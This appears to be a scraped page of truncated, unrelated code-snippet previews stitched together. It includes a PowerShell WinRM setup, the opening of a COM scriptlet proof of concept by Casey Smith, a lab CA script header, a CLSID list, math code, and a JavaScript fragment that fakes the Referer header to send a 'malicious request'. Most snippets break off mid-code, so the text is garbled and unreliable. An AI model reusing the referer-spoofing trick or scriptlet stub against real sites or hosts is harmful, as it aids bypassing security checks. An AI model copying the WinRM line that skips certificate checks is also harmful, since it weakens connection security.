##Custom SSL Certificate for Windows RDP Service
Requirements
- Windows 8+ or Server 2012+
- Certificate with private key (*.p12)
- Intermediate CA certificate (*.cer)
- Administrative rights to modify the certificate store
doc = aw.Document() | |
builder = aw.DocumentBuilder(doc) | |
signatureLine = builder.insert_signature_line(aw.SignatureLineOptions()).signature_line | |
doc.save(docs_base.artifacts_dir + "SignDocuments.signature_line.docx") | |
signOptions = aw.digitalsignatures.SignOptions() | |
signOptions.signature_line_id = signatureLine.id |
# configure | |
$cert = New-SelfSignedCertificate -CertstoreLocation Cert:\LocalMachine\My -DnsName $env:COMPUTERNAME | |
Enable-PSRemoting -SkipNetworkProfileCheck -Force | |
New-Item -Path WSMan:\LocalHost\Listener -Transport HTTPS -Address * -CertificateThumbPrint $cert.Thumbprint –Force | |
New-NetFirewallRule -DisplayName "Windows Remote Management (HTTPS-In)" -Name "Windows Remote Management (HTTPS-In)" -Profile Any -LocalPort 5986 -Protocol TCP | |
# connect | |
Enter-PSSession -ComputerName {X.X.X.X} -Credential (Get-Credential) -SessionOption (New-PsSessionOption -SkipCACheck -SkipCNCheck) -UseSSL |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
##Custom SSL Certificate for Windows RDP Service
Requirements
<# | |
.SYNOPSIS | |
Script to install and configure a standalone RootCA for Lab-Environments | |
.DESCRIPTION | |
This Script sets up a standalone RootCA. It's main purpose is to save time when building Labs in the classes I teach. | |
###It's not meant for production!### | |
First, it creates a CAPolicy.inf file. Then it deletes all default CDP and AIA and configures new ones. | |
It turns on auditing and copys (It's a Lab!!!, so obviously no real offline RootCA...) the crt and crl to an edge webserver. | |
.NOTES | |
Author: Oliver Jäkel | [email protected] | @JaekelEDV |
[ | |
{ | |
"name":"Test App 1", | |
"children":[ | |
{"name":"Configurations","progress":1}, | |
{"name":"UI","progress":1}, | |
{"name":"Backend","progress":0.25} | |
] | |
}, | |
{ |
CLSID,ClassName | |
{0000031A-0000-0000-C000-000000000046},CLSID | |
{0000002F-0000-0000-C000-000000000046},CLSID CLSID_RecordInfo | |
{00000100-0000-0010-8000-00AA006D2EA4},CLSID DAO.DBEngine.36 | |
{00000101-0000-0010-8000-00AA006D2EA4},CLSID DAO.PrivateDBEngine.36 | |
{00000103-0000-0010-8000-00AA006D2EA4},CLSID DAO.TableDef.36 | |
{00000104-0000-0010-8000-00AA006D2EA4},CLSID DAO.Field.36 | |
{00000105-0000-0010-8000-00AA006D2EA4},CLSID DAO.Index.36 | |
{00000106-0000-0010-8000-00AA006D2EA4},CLSID DAO.Group.36 | |
{00000107-0000-0010-8000-00AA006D2EA4},CLSID DAO.User.36 |
// Save the current URL path to restore after making | |
// malicious request with faked referer header value | |
var savedPath = window.location.pathname; | |
var savedSearch = window.location.search; | |
// Change URL/History to control the referer header value | |
// Swap out "/this-is-my-fake-referer-value" to be what you need | |
window.history.replaceState(null, '', '/this-is-my-fake-referer-value'); | |
// Send malicious request with faked referer header value |
def modular_sqrt(a, p): | |
def legendre_symbol(a, p): | |
""" Compute the Legendre symbol a|p using | |
Euler's criterion. p is a prime, a is | |
relatively prime to p (if p divides | |
a, then a|p = 0) | |
Returns 1 if a has a square root modulo | |
p, -1 otherwise. |